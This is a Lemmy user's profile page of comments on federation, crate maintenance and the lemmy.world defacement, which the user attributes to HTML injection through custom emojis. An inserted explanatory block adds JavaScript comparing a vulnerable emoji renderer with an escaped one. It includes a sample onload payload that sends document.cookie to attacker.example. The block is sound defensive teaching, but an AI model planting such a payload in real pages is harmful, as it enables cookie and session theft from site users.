Just some Internet guy

He/him/them 🏳️‍🌈

  • 0 Posts
  • 15 Comments
Joined 1Y ago
Cake day: Jun 25, 2023


The federation aspect adds complexity. A lot of complexity.

The only thing the fediverse might enable is nobodies like me can theoretically write social media software and actually make it successful without becoming a VC-funded social media startup and having to resort to ads and premium tiers.

But things that couldn’t be done without the fediverse as a base? Nah not really.

Note that the concept of federation is really old. Emails are a form of federation. XMPP was federated too. Heck, Diaspora* is pretty old and tried to make an open Facebook for almost as long as Facebook’s been mainstream.


It all depends on how “finished” the project is, and how much it has to track a moving ecosystem.

There’s a lot of crates that you can probably write once and be done with it. Like, a unit converter that’s not been updated since the first version of Rust is probably still just fine to use. A meter and a foot won’t change length anytime soon.

Even a GTK app that’s not been updated in 5 years might not be a problem at all as long as it compiles. Windows is full of apps that were written 30 years ago and are still shipped basically unchanged. The calculator and notepad were two examples until Windows 10/11.

Another example: an FTP library or client. It’s basically a dead protocol at this point, so even if it’s not been updated in years, it’s likely fine and there’s not much to improve on.

It really depends on what it does and how much the rest of the world around it is changing and how complete the code is already.


Except not everyone has learned English; not everyone can, especially older people.

Lemmy has that feature built-in that communities can support arbitrary languages. If you don’t want to see them you can literally just pick your languages in your profile, and it’ll automatically ignore what you can’t read.

A bit weird in practice, but it’s intended from the start to be available in everyone’s languages without having to make news-de, news-fr, news-es communities or have to rely on regional instances.

If we went with maximizing who can read your post then it should be in Chinese. The assumption that English is the default language for everything is very American.


Imagine a post from a tiny instance running on the cheapest VPS going viral and now all of the top Lemmy instances are trying to embed it from the tiny instance. It would immediately blow up.

That would increase the barrier to entry massively, and all that to save a few GBs of disk space. It’s small enough it wouldn’t even fill up half of my phone’s storage that I’m carrying in my pocket all the time.

What’s wasteful is the MBs of JavaScript you load on most modern websites infested with all the video ads.


What Lemmy does is also very effective because each instance acts as a cache for the other instances. If any given post is viewed more than once from a remote instance, it ends up cheaper in CPU and bandwidth.

On bigger instances, the cost of federation is very small compared to the load of serving the instance’s users.

It also allows instances to have their own sorting algorithms, discovery algorithms, you name it. You have the data, you can crunch the numbers however you want for your users. You can develop your own spam filters and tools.

Even on my small 5-user instance, that’s 4 users’ worth of traffic that never hits the bigger instances. Probably more because I refresh the home page a few times a day whenever I open up my app to scroll a bit.


It’s supposed to come out soon but there’s some compatibility issues with apps still which may delay instances that want to remain as compatible as possible. It’s a pretty big change.


GitHub PR fixing the bug: https://github.com/LemmyNet/lemmy-ui/pull/1897/files

If your instance has custom emojis defined, this is exploitable everywhere Markdown is available. It is NOT restricted to admins, but can be used to steal an admin’s JWT, which then lets the attacker get into that admin’s account which can then spread the exploit further by putting it somewhere where it’s rendered on every single page and then deface the site.

If your instance doesn’t have any custom emojis, you are safe, the exploit requires custom emojis to trigger the bad code branch.


That’s probably what happened here because they did revoke the admin’s access, but it continued.


The admins now appear to have taken down the backend in an effort to stop the defacing.


As for the version, my instance reports it as

0.18.1-2-ga6cc12afe

So it seems to be using some extra patches, but I can’t find that commit on GitHub which indicates it might not be public, or cherry-picked locally.

So with this in mind, either it’s just innocent performance patches, or someone potentially also introduced the markdown vulnerability.

Although it’s also entirely possible I suck and wasn’t able to reproduce it correctly/had wrong quoting or something. Hopefully the devs can shine some light in the details.


Pretty much, and it’s not even XSS (it’s not cross-site), it’s just plain basic HTML injection breaking out of Markdown. At least as far as I was able to find.


Only lemonparty (which then redirects to chaturbate) and the pedo image hosted in the pictrs of lemmy.world itself. I saw no evidence of anything else; as people said, it’s a pretty oldschool type of hack to disturb, not spread malware.

But I didn’t dig that much further than that, and it’s only a snapshot of what I gathered before it got fixed. I Ctrl+F “lemonparty” in view source and pasted the JSON in VScode and that’s about it. Didn’t dig much deeper if that was just a red herring.


I tried to reproduce the exploit on my own instance and it appears that the official Docker for 0.18.1 is not vulnerable to it.

It appears that the malicious code was injected as an onload property in the markdown for taglines. I tried to reproduce in taglines, instance info, in a post with no luck: it always gets escaped properly in the <img alt="exploit here"> property as an HTML entity.

lemmy.world appears to be running a git commit that is not public.
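The escaping issue the comments above describe (custom-emoji text landing in an <img alt="…"> attribute, and the onload handler that appears when it is not entity-escaped) as an added example, not code from lemmy-ui or from the commenter: a constructed emoji record, a vulnerable renderer that concatenates the alt text straight into the tag, a hardened renderer that escapes every attribute value, and a small attribute lister used to check whether the injected text became a real attribute. The function names, the emoji record and the attacker URL are all made up for this illustration.

```javascript
// Added example, not code from lemmy-ui. Shows how attacker-controlled custom
// emoji text can break out of an <img> attribute when it is concatenated into
// HTML unescaped, and how entity-escaping the attribute value prevents it.

// Escape a value for use inside a double-quoted HTML attribute.
function escapeAttr(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Vulnerable renderer: the emoji's alt text goes straight into the tag.
function renderEmojiVulnerable(emoji) {
  return `<img class="emoji" src="${emoji.url}" alt="${emoji.alt}" title="${emoji.alt}">`;
}

// Hardened renderer: every attribute value is escaped before insertion.
function renderEmojiSafe(emoji) {
  const url = escapeAttr(emoji.url);
  const alt = escapeAttr(emoji.alt);
  return `<img class="emoji" src="${url}" alt="${alt}" title="${alt}">`;
}

// List the attribute names of a single HTML start tag, honouring quoting.
// Used below to check whether injected text became a real attribute.
function attributeNames(tag) {
  const inner = tag.replace(/^<\w+/, "").replace(/\/?>$/, "");
  const re = /\s+([A-Za-z_:][-\w:.]*)(?:\s*=\s*("[^"]*"|'[^']*'|[^\s"'>]+))?/g;
  const names = [];
  let m;
  while ((m = re.exec(inner)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// Does the rendered tag carry any on* event-handler attribute?
function hasEventHandler(tag) {
  return attributeNames(tag).some((n) => n.startsWith("on"));
}

// Constructed sample (hypothetical): a custom emoji whose alt text closes the
// alt="" attribute and adds an onload handler that exfiltrates cookies.
const maliciousEmoji = {
  shortcode: "evil",
  url: "/pictrs/image/example.png",
  alt: "smile\" onload=\"fetch('https://attacker.example/?c='+document.cookie)",
};

console.log(renderEmojiVulnerable(maliciousEmoji));
console.log(hasEventHandler(renderEmojiVulnerable(maliciousEmoji))); // true
console.log(renderEmojiSafe(maliciousEmoji));
console.log(hasEventHandler(renderEmojiSafe(maliciousEmoji))); // false
```

The hardened renderer is only safe because every value sits inside a double-quoted attribute and the double quote is among the escaped characters; an unquoted attribute or a value placed into a script or URL context would need its own, stricter encoding. The attribute lister is a checking aid for this example, not a substitute for a real HTML parser.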



Not a whole lot - you might see some spam being federated from lemmy.world but I’d expect the lemmy.ml and lemmy.world admins will fix it, and then clean it up.

That’s probably a good stress test to figure out how to handle that.


Just go to https://lemmy.world and see for yourself, although be careful it’s nasty.

As of now it looks like this:

And then it randomly redirects to gore sites like lemonparty or chaturbate or some pedo shit. It’s pretty bad.